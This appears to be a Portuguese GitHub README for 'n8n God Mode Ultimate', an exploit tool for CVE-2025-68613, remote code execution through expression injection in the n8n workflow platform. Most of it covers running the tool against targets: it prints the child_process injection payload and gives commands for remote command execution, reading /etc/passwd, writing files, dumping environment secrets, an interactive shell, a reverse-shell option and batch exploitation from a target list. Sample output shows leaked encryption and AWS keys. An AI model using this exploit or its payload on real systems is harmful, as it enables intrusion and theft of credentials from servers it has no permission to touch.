
n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho
n8n God Mode Ultimate é um framework abrangente de teste de segurança projetado para detectar e validar o CVE-2025-68613 em plataformas de automação de workflows n8n. Esta vulnerabilidade crítica de Execução Remota de Código (RCE) afeta versões do n8n através de injeção de expressões em contextos de execução de workflows.
Versões Afetadas:
Versões Corrigidas:
--detect - Apenas detecção de versão (mais rápida, não intrusiva)--safe - Verificação segura de vulnerabilidade sem exploração--poc - Validação de prova de conceito RCE--exploit - Modo de exploração completoread <file> - Ler arquivos remotoswrite <file> <content> - Escrever arquivos no alvo# Python 3.8 ou superior
python3 --version
# gerenciador de pacotes pip
pip3 --version
# Clone o repositório
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Instale os pacotes necessários
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Exibir menu de ajuda
python3 n8n-godmode-ultimate.py -h
# Detectar versão do n8n (não intrusivo)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Verificação segura de vulnerabilidade
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Prova de conceito RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Exploração completa
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Executar comando único
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Ler arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Escrever arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Extrair variáveis de ambiente
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Shell interativo
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Escanear múltiplos alvos a partir de arquivo
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Exploração em lote
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
Formato do targets.txt:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Uma vez no modo shell (--shell):
n8n> whoami # Executar comando
n8n> read /etc/passwd # Ler arquivo
n8n> env # Mostrar variáveis de ambiente
n8n> info # Informações do sistema
n8n> history # Histórico de comandos
n8n> exit # Sair do shell
-u, --url URL URL do n8n alvo
-l, --list FILE Arquivo contendo URLs dos alvos
-t, --threads NUM Número de threads para varredura em lote (padrão: 10)
-e, --email EMAIL Email do usuário n8n
-p, --password PASS Senha do usuário n8n
--detect Apenas detecção de versão (mais rápida)
--safe Verificação segura sem exploração
--poc Prova de conceito RCE
--exploit Modo de exploração completo
--god Ativar modo deus
--cmd COMMAND Executar comando único
--read-file PATH Ler arquivo remoto
--write-file PATH Escrever arquivo remoto
--content DATA Conteúdo para operação de escrita
--dump-env Extrair todas as variáveis de ambiente
--shell Modo shell interativo
--revshell HOST:PORT Payload de reverse shell
--mode MODE Modo de exploração: schedule|webhook|code|expression (padrão: schedule)
--timeout SEC Tempo limite do comando em segundos (padrão: 30)
--cleanup Excluir workflows após a execução
-k, --insecure Desabilitar verificação SSL
-v, --verbose Saída detalhada
-q, --quiet Saída mínima
Cria um workflow com um gatilho agendado que executa automaticamente a cada 3 segundos. Método mais confiável.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Cria um endpoint webhook HTTP que executa comandos quando acionado.
Injeta código diretamente em um nó de Código com acesso ao child_process.
Execução manual através do sistema de avaliação de expressões do n8n.
Extrai a versão da configuração Sentry codificada em base64 na página de login:
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
/rest/login - Autenticação/rest/workflows - Operações CRUD de workflows/rest/credentials - Enumeração de credenciais/rest/executions - Recuperação de logs de execução/rest/users - Enumeração de usuários/rest/settings - Configuração do sistema[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root
n8n> whoami
[+] root
n8n> read /etc/hostname
[+] n8n-production-server
n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...
APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS
Esta ferramenta é fornecida para fins educacionais e testes de segurança autorizados. Os usuários devem cumprir todas as leis e regulamentos aplicáveis.
VOCÊ DEVE:
VOCÊ NÃO DEVE:
O autor NÃO assume responsabilidade pelo uso indevido desta ferramenta. O acesso não autorizado a sistemas de computador é ilegal de acordo com:
Use por sua conta e risco. Você é responsável por suas ações.
Contribuições são bem-vindas! Por favor, siga estas diretrizes:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Satyam Rastogi
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.
MIT License
Copyright (c) 2025 Satyam Rastogi
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
Para problemas de segurança, reporte de forma responsável:
⭐ Dê uma estrela neste repositório se achou útil!
Feito com 💻 por pesquisadores de segurança, para pesquisadores de segurança